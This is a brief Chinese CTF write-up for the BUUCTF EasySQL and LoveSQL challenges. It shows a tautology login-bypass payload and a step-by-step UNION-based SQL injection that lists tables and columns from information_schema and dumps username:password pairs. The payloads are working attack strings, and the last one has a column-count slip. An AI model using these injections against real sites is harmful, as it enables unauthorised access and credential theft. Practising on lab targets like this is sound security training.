【Buuctf】[极客大挑战 2019]EasySQL & LoveSQL WP
EasySQL WP
这个题的考点主要是万能密码,注入的时候用hackbar可以提高效率。
hackbar的在firefox目前是收费的,可以去网上找之前的版本,下载安装。安装的时候注意把自动更新关闭,因为这个我重新安装了好多次😔。
万能密码的实质就是利用后台对用户登录信息没有检验,通过结合原来的url进行一系列的构造,创造一个能通过验证的信息。
这个题我用的是 admin ‘a’='a 密码为1登陆成功的。
LoveSQL WP
这个题用上一次的方法肯定是行不通的。
首先用order by测试出有3列(在4的时候报错)。然后开始尝试注入,这个题用union联合注入就行得通,所以直接干,上代码-》
uesrname=1' union select 1,database(),3 #
得到库名为geek。然后基本操作,爆表
username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
得到两个表,geekuser和l0ve1ysq1。我的运气比较好,靠感觉先去试的l0ve1ysq1。
uesrname=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1' #
然后打印username和password
username=1' union select group_concat(username,0x3a,password) from l0ve1ysq1#
flag就是其中一组的password